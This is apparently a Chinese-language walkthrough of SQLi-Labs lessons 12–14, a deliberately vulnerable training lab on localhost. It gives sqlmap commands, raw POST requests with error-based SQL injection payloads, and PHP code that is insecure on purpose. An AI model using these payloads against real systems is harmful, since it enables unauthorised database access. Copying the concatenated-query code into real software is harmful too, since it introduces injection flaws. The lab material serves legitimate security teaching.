【Mysql sql inject】【入門篇】SQLi-Labs使用 part 2

標籤：

• Less-12 - POST - Error Based- Double quotes- String

1）知識點

    主要考察報錯注入中的雙引號閉合注入情況。

2）工具用法：

SQLMAP POST注入用法之一，注入點處加 * 號，也可以用-r選項。sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-12/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES

3）手工注入

POST /hacker/sqli-labs-master/Less-12/index.php?id=1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 98 uname=111") UNION ALL SELECT 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit

4）注入點代碼

// take the variablesif(isset($_POST[‘uname‘]) && isset($_POST[‘passwd‘])){$uname=$_POST[‘uname‘];$passwd=$_POST[‘passwd‘]; //logging the connection parameters to a file for analysis.$fp=fopen(‘result.txt‘,‘a‘);fwrite($fp,‘User Name:‘.$uname."\n");fwrite($fp,‘Password:‘.$passwd."\n");fclose($fp);  // connectivity$uname=‘"‘.$uname.‘"‘;   //雙引號閉合$passwd=‘"‘.$passwd.‘"‘;@$sql="SELECT username, password FROM users WHERE username=($uname) and password=($passwd) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);

 

• Less-13- Double Injection- String- with twist

1）知識點

    主要考察報錯注入中的單引號+括弧閉合注入情況。

2）工具用法：

sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-13/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES

3）手工注入

POST /hacker/sqli-labs-master/Less-13/index.php?id=1 HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 93 uname=111‘) union select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit

4）注入點產生代碼

// take the variablesif(isset($_POST[‘uname‘]) && isset($_POST[‘passwd‘])){$uname=$_POST[‘uname‘];$passwd=$_POST[‘passwd‘]; //logging the connection parameters to a file for analysis.$fp=fopen(‘result.txt‘,‘a‘);fwrite($fp,‘User Name:‘.$uname."\n");fwrite($fp,‘Password:‘.$passwd."\n");fclose($fp);  // connectivity@$sql="SELECT username, password FROM users WHERE username=(‘$uname‘) and password=(‘$passwd‘) LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);

 

• Less-14- Double Injection- Double quotes- String

1）工具用法：

sqlmap -u "http://127.0.0.1/hacker/sqli-labs-master/Less-14/index.php" --data "uname=111*&passwd=111&submit=Submit" --current-db --threads 10 --batch --technique BES

2）手工注入

POST /hacker/sqli-labs-master/Less-14/index.php HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 92 uname=111" union select 1,updatexml(1,concat(0x7e,database()),1) #&passwd=111&submit=Submit

3）注入點產生代碼

if(isset($_POST[‘uname‘]) && isset($_POST[‘passwd‘])){$uname=$_POST[‘uname‘];$passwd=$_POST[‘passwd‘]; //logging the connection parameters to a file for analysis.$fp=fopen(‘result.txt‘,‘a‘);fwrite($fp,‘User Name:‘.$uname."\n");fwrite($fp,‘Password:‘.$passwd."\n");fclose($fp);  // connectivity$uname=‘"‘.$uname.‘"‘;$passwd=‘"‘.$passwd.‘"‘;@$sql="SELECT username, password FROM users WHERE username=$uname and password=$passwd LIMIT 0,1";$result=mysql_query($sql);$row = mysql_fetch_array($result);

 

【Mysql sql inject】【入門篇】SQLi-Labs使用 part 2